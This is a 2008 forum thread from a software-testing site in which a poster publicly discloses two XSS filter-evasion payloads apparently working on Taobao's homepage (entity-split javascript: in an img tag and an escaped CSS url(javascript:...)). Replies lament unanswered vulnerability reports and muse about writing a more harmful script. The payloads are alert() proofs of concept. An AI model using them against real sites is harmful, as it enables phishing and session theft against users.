51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 5404|回复: 8
打印 上一主题 下一主题

淘宝首页XSS(新的2处)

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2008-10-21 13:38:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
写到自己博客上了:http://www.bzcyer.com/view.asp?id=72

这里也贴一份,虽然没多少实际的用途,最多就做下钓鱼,
1、可以插入回车、包括段末结尾符和换行符的两种、即char(10)和char(13)、tab空格

<img src="&#25;jav&#13;as&#10;cript:al&#13;ert('test');">


2.转码

<DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029\0029">

原始的代码是: <DIV STYLE="background-image:url(javascript:alert('XSS'))">



刚那没转码的:<DIV STYLE="background-image:url(javascript:alert('XSS'))">,试下一样出问题,看来这里转不转码都会出问题。
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏
回复

使用道具 举报

该用户从未签到

2#
 楼主| 发表于 2008-10-21 13:40:53 | 只看该作者
在个人账户后台那,也有一些,taobao也没人处理,哎
现在是注册N多帐号,基本上测一次,报废1个帐号
回复 支持 反对

使用道具 举报

该用户从未签到

3#
 楼主| 发表于 2008-10-27 14:54:53 | 只看该作者
淘宝客服的回复,哎...

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?(注-册)加入51Testing

x
回复 支持 反对

使用道具 举报

该用户从未签到

4#
发表于 2008-11-8 00:20:37 | 只看该作者
我在他们公司内网上也发过,可惜没有人理会。
还有很多。即使过滤过的一些漏洞,稍微变形一下,也可以测试出来。
无语了。

他们对xss不重视。
看来只有做出一个什么比较有危害的脚本,才可以“打动”他们。

不知道有没有注入漏洞。注入漏洞更危险。
回复 支持 反对

使用道具 举报

该用户从未签到

5#
 楼主| 发表于 2008-11-8 18:53:30 | 只看该作者
这个只是小问题,都没人处理,那我手上的一些严重的权限bug,都不能公布在网上,想告诉淘宝,得,也没人理。

那就继续放着好了。
回复 支持 反对

使用道具 举报

该用户从未签到

6#
发表于 2008-12-23 16:01:26 | 只看该作者
淘宝照这样看来不安全哦
回复 支持 反对

使用道具 举报

该用户从未签到

7#
发表于 2008-12-24 17:44:22 | 只看该作者
有机会一定加强学习
回复 支持 反对

使用道具 举报

该用户从未签到

8#
发表于 2009-4-30 11:21:15 | 只看该作者
一年前的帖子,淘宝应该现在重视了吧~~
回复 支持 反对

使用道具 举报

该用户从未签到

9#
发表于 2011-11-16 14:54:37 | 只看该作者
幸亏我们不是黑客
回复 支持 反对

使用道具 举报

本版积分规则

关闭

站长推荐上一条 /1 下一条

小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

GMT+8, 2024-11-8 23:44 , Processed in 0.073514 second(s), 28 queries .

Powered by Discuz! X3.2

© 2001-2024 Comsenz Inc.

快速回复 返回顶部 返回列表